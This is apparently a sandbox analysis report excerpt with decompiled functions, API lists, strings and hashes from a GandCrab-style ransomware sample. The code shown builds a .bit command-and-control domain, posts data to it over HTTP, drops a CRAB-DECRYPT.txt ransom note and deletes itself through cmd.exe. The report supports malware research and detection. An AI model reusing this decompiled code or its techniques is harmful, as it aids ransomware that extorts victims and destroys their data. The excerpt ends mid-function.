				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xf4f0540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xf4f0520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0F4E5060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0f4e5226
0x0f4e5236
0x0f4e5241
0x0f4e5246
0x0f4e524c
0x0f4e525b
0x0f4e5261
0x0f4e5266
0x0f4e526d
0x0f4e5273
0x0f4e527a
0x0f4e5281
0x0f4e5285
0x0f4e5288
0x0f4e528e
0x0f4e5290
0x0f4e5295
0x0f4e529b
0x0f4e529d
0x0f4e52a2
0x0f4e52a4
0x0f4e52a4
0x0f4e52a8
0x0f4e52a9
0x0f4e52af
0x0f4e52b4
0x0f4e52b6
0x0f4e52b9
0x0f4e52b9
0x0f4e52be
0x0f4e52c5
0x0f4e52c5
0x0f4e52ec
0x0f4e52ef
0x0f4e52f1
0x0f4e52f6
0x0f4e52ff
0x0f4e5307
0x00000000
0x00000000
0x0f4e5310
0x0f4e5316
0x0f4e5319
0x0f4e5319
0x0f4e531e
0x0f4e5328
0x0f4e5339
0x0f4e533f
0x0f4e533f
0x0f4e5347

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F4E5288
Sleep.KERNEL32(000003E8), ref: 0F4E52C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F4E52D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F4E52E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F4E52FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E5310
wsprintfW.USER32 ref: 0F4E5328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E5339

Strings

m.bi, xrefs: 0F4E5266
.bit, xrefs: 0F4E527A
gdcb, xrefs: 0F4E5273
t, xrefs: 0F4E525B
t, xrefs: 0F4E526D
fabian wosar <3, xrefs: 0F4E52F9

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: 638da793c5abf2b6e3bcc9e02300dcfd4c0c4b7a66d852753e9a445cd6beb5cc
Instruction ID: bf29dcfa16f663f610728140689752775eca7c63a675dc977bc17c817fafaacd
Opcode Fuzzy Hash: 638da793c5abf2b6e3bcc9e02300dcfd4c0c4b7a66d852753e9a445cd6beb5cc
Instruction Fuzzy Hash: 8B31C971E00319ABDB00CFA4DD85BEEBB78FF44726F100115FE45BA282D7B95A148B94

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E54F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0F4E54F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0F4E7E40( &_v28);
				_v16 = E0F4E5220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xf4efb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xf4efb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xf4efb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xf4efb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xf4efb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xf4efb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0F4E8050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0F4E53D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

0x0f4e54f8
0x0f4e54fa
0x0f4e5501
0x0f4e5504
0x0f4e550f
0x0f4e5525
0x0f4e552c
0x0f4e5542
0x0f4e5546
0x0f4e554b
0x0f4e5558
0x0f4e5558
0x0f4e555a
0x0f4e555e
0x0f4e5564
0x0f4e556d
0x0f4e5572
0x0f4e557a
0x0f4e557f
0x0f4e5587
0x0f4e558c
0x0f4e5594
0x0f4e5599
0x0f4e55a1
0x0f4e55a6
0x0f4e55ae
0x0f4e55b3
0x0f4e55bc
0x0f4e55c5
0x0f4e55c9
0x0f4e55ca
0x0f4e55d2
0x0f4e55d7
0x0f4e55e1
0x0f4e55e2
0x0f4e55e3
0x0f4e55e9
0x0f4e55ee
0x0f4e55f6
0x0f4e55fc
0x0f4e5601
0x0f4e5609
0x0f4e5617
0x0f4e5627
0x0f4e5619
0x0f4e5619
0x0f4e561e
0x0f4e5623
0x0f4e5623
0x0f4e561e
0x0f4e5617
0x0f4e5601
0x0f4e5637
0x0f4e5643
0x0f4e564d
0x0f4e564f
0x0f4e5654
0x0f4e5657
0x0f4e5657
0x0f4e5665
0x0f4e5665
0x0f4e554d
0x0f4e5552
0x00000000
0x0f4e5554
0x0f4e5554
0x00000000
0x0f4e5554

APIs

Part of subcall function 0F4E7E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F4E8024
Part of subcall function 0F4E7E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F4E803D

Part of subcall function 0F4E5220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0F4E5288
Part of subcall function 0F4E5220: Sleep.KERNEL32(000003E8), ref: 0F4E52C5
Part of subcall function 0F4E5220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F4E52D3
Part of subcall function 0F4E5220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F4E52E3
Part of subcall function 0F4E5220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F4E52FF
Part of subcall function 0F4E5220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E5310
Part of subcall function 0F4E5220: wsprintfW.USER32 ref: 0F4E5328
Part of subcall function 0F4E5220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E5339

lstrlenA.KERNEL32(00000000,00000000,00000000,74716980), ref: 0F4E5512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F4E5532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F4E5544
lstrcatA.KERNEL32(00000000,?), ref: 0F4E555E
lstrlenA.KERNEL32(00000000), ref: 0F4E55B3
lstrlenW.KERNEL32(?), ref: 0F4E55BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F4E55DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E5637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F4E5643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F4E564D
InternetCloseHandle.WININET(0F4E581B), ref: 0F4E5657

Strings

POST, xrefs: 0F4E55CA
popkadurak, xrefs: 0F4E55E9

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: 1eaf583208533cd2f11b80df2d208d6edfd88cc666f04485a6c19a2ef8cad026
Instruction ID: d795920324996c6ded4395d1242ca7be866a4242f08ee12e30415f2f20e93a23
Opcode Fuzzy Hash: 1eaf583208533cd2f11b80df2d208d6edfd88cc666f04485a6c19a2ef8cad026
Instruction Fuzzy Hash: 8941A575D00309AAEB109FA9DC41FEEBF79BF88722F144516EE44F6242EB785644CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E72A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0F4E72A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0f4e72a0
0x0f4e72a8
0x0f4e72aa
0x0f4e72ae
0x0f4e72b3
0x0f4e72c1
0x0f4e72c4
0x0f4e72c9
0x0f4e72c9
0x0f4e72cf
0x0f4e72d9
0x0f4e72e0
0x0f4e72e4
0x0f4e72e7
0x0f4e72e7
0x0f4e72ed
0x0f4e72fb
0x0f4e72fd
0x0f4e7305
0x0f4e7308
0x0f4e7308
0x0f4e730e
0x0f4e731c
0x0f4e731e
0x0f4e7326
0x0f4e7329
0x0f4e7329
0x0f4e732f
0x0f4e733d
0x0f4e733f
0x0f4e7347
0x0f4e734a
0x0f4e734a
0x0f4e7350
0x0f4e735e
0x0f4e7360
0x0f4e7368
0x0f4e736b
0x0f4e736b
0x0f4e7371
0x0f4e737f
0x0f4e7381
0x0f4e7389
0x0f4e738c
0x0f4e738c
0x0f4e7392
0x0f4e73a0
0x0f4e73a2
0x0f4e73aa
0x0f4e73ad
0x0f4e73ad
0x0f4e73b3
0x0f4e73b5
0x0f4e73b5
0x0f4e73bc
0x0f4e73ca
0x0f4e73cc
0x0f4e73d4
0x0f4e73d7
0x0f4e73d7
0x0f4e73e0
0x0f4e740c
0x0f4e73e2
0x0f4e73e8
0x0f4e7406
0x0f4e7406

APIs

lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72F2
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E72FD
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7313
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E731E
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7334
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E733F
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7355
lstrlenW.KERNEL32(0F4E4B36,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7360
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7376
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7381
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E7397
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73A2
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73C1
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73CC
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73E8
lstrlenW.KERNEL32(?,?,?,?,0F4E4819,00000000,?,00000000,00000000,?,00000000), ref: 0F4E73F6

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: c37370fab7c03297d0fceab92e2f834f41c6f9c1258cde4b508f5b1fbfeb1d01
Instruction ID: 6c9d422fb9c5f1aff68d1894f701fec90760c89dae9a8af305ace589b2cedebb
Opcode Fuzzy Hash: c37370fab7c03297d0fceab92e2f834f41c6f9c1258cde4b508f5b1fbfeb1d01
Instruction Fuzzy Hash: 3F411032100652EFC7229FB8DD8C7D5BBA1FF04326F094535E81682A22D779B978DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E5F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0F4E5F00(void* __ecx, intOrPtr __edx, void* __esi) {
				CHAR* _v8;
				intOrPtr _v12;
				char _v267;
				char _v268;
				CHAR* _t10;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t20;
				void* _t24;
				void* _t31;
				void* _t35;

				_t10 =  *0xf4f2a78; // 0x0
				_v12 = __edx;
				_t24 = __ecx;
				_v8 = _t10;
				_t31 = VirtualAlloc(0, 0xa, 0x3000, 4);
				if(_t31 != 0) {
					_t13 = GetModuleHandleA("ntdll.dll");
					if(_t13 != 0) {
						_t20 = GetProcAddress(_t13, "RtlComputeCrc32");
						wsprintfA(_t31, "%Xeuropol",  *_t20(0x29a, _v8, lstrlenA(_v8), __esi));
						_t35 = _t35 + 0xc;
					}
					_v268 = 0;
					E0F4E9170( &_v267, 0, 0xff);
					E0F4E5DC0( &_v268, _t31, lstrlenA(_t31));
					E0F4E5E70( &_v268, _t24, _v12);
					VirtualFree(_t31, 0, 0x8000);
				}
				return _t24;
			}

0x0f4e5f09
0x0f4e5f1b
0x0f4e5f1e
0x0f4e5f20
0x0f4e5f29
0x0f4e5f2d
0x0f4e5f38
0x0f4e5f40
0x0f4e5f49
0x0f4e5f6c
0x0f4e5f72
0x0f4e5f75
0x0f4e5f81
0x0f4e5f8b
0x0f4e5fa3
0x0f4e5fb3
0x0f4e5fc3
0x0f4e5fc3
0x0f4e5fd0

APIs

VirtualAlloc.KERNEL32(00000000,0000000A,00003000,00000004,00000000,00000000), ref: 0F4E5F23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0F4E5F38
GetProcAddress.KERNEL32(00000000,RtlComputeCrc32), ref: 0F4E5F49
lstrlenA.KERNEL32(00000000), ref: 0F4E5F54
wsprintfA.USER32 ref: 0F4E5F6C
_memset.LIBCMT ref: 0F4E5F8B
lstrlenA.KERNEL32(00000000), ref: 0F4E5F94
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F4E5FC3

Strings

RtlComputeCrc32, xrefs: 0F4E5F43
ntdll.dll, xrefs: 0F4E5F33
%Xeuropol, xrefs: 0F4E5F66

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: Virtuallstrlen$AddressAllocFreeHandleModuleProc_memsetwsprintf
String ID: %Xeuropol$RtlComputeCrc32$ntdll.dll
API String ID: 218840185-1387466253
Opcode ID: e9bdb42f8f9bdfbe3a537a1f7654404087368e457da302af644e5f8b054e5be0
Instruction ID: aae6f71796be0926e4daef345d184195d704848181e505ba81748dbab282cdb1
Opcode Fuzzy Hash: e9bdb42f8f9bdfbe3a537a1f7654404087368e457da302af644e5f8b054e5be0
Instruction Fuzzy Hash: 90115B31E40304BBD7209B68AC49FEEBF78AF44722F1400A9FD04E6282EAB859548A11

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E6D40 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E6D40(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\CRAB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0xf4f2a64; // 0xf4f2000
					if(_t7 != 0) {
						WriteFile(_t22,  *0xf4f2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0f4e6d5b
0x0f4e6d63
0x0f4e6d85
0x0f4e6d8a
0x0f4e6d9e
0x0f4e6da5
0x0f4e6dbe
0x0f4e6dbe
0x0f4e6dc5
0x0f4e6dcb
0x0f4e6d8c
0x0f4e6d99
0x0f4e6d99
0x0f4e6dd8
0x0f4e6de6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F4E6E22,00000000,?,?), ref: 0F4E6D55
wsprintfW.USER32 ref: 0F4E6D63
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F4E6D7F
GetLastError.KERNEL32(?,?), ref: 0F4E6D8C
lstrlenW.KERNEL32(0F4F2000,?,00000000,?,?), ref: 0F4E6DAE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F4E6DBE
CloseHandle.KERNEL32(00000000,?,?), ref: 0F4E6DC5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F4E6DD8

Strings

%s\CRAB-DECRYPT.txt, xrefs: 0F4E6D5D

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\CRAB-DECRYPT.txt
API String ID: 2985722263-2724392667
Opcode ID: d26ce2bfd2572f65aba7ffe8960a316e9893b7b897400cc09c8583ca70860b6f
Instruction ID: 3e11a9c030c4be29cb8f661a745889b467279a79bf7c5970bc618fcfc07f1baf
Opcode Fuzzy Hash: d26ce2bfd2572f65aba7ffe8960a316e9893b7b897400cc09c8583ca70860b6f
Instruction Fuzzy Hash: D50192353402107BF3209B64AD8AFAA7E5CDB55B37F100121FF05A91C2DAE869248669

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E5350 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E5350() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x0f4e5376
0x0f4e537a
0x0f4e537e
0x0f4e5388
0x0f4e5390
0x0f4e5399
0x0f4e53b3
0x0f4e53b3
0x0f4e5390
0x0f4e53bb

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F4E54E9,00000000,?,?,?,?,0F4E5615,00000000,popkadurak,00000000), ref: 0F4E5366
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E5378
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E5388
wsprintfW.USER32 ref: 0F4E5399
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F4E53B3
ExitProcess.KERNEL32 ref: 0F4E53BB

Strings

cmd.exe, xrefs: 0F4E53A7
open, xrefs: 0F4E53AC
/c timeout -c 5 & del "%s" /f /q, xrefs: 0F4E5393

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: ae5a5ed0ed2d9ce973e424d7647889645fed729dfa361a833ab5b6b94038f3dd
Instruction ID: de22e8212945f9b9df5e1bf4d5ea02fc31cceb5963aeca9152a5c20bce755138
Opcode Fuzzy Hash: ae5a5ed0ed2d9ce973e424d7647889645fed729dfa361a833ab5b6b94038f3dd
Instruction Fuzzy Hash: F2F0AC727C131077F36156655C1BF876D199B85F37F290006BF04BE1C285E4691486A9

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E2C50 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 62
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0F4E2C50(struct HWND__* _a4, int _a8, int _a12, long _a16) {
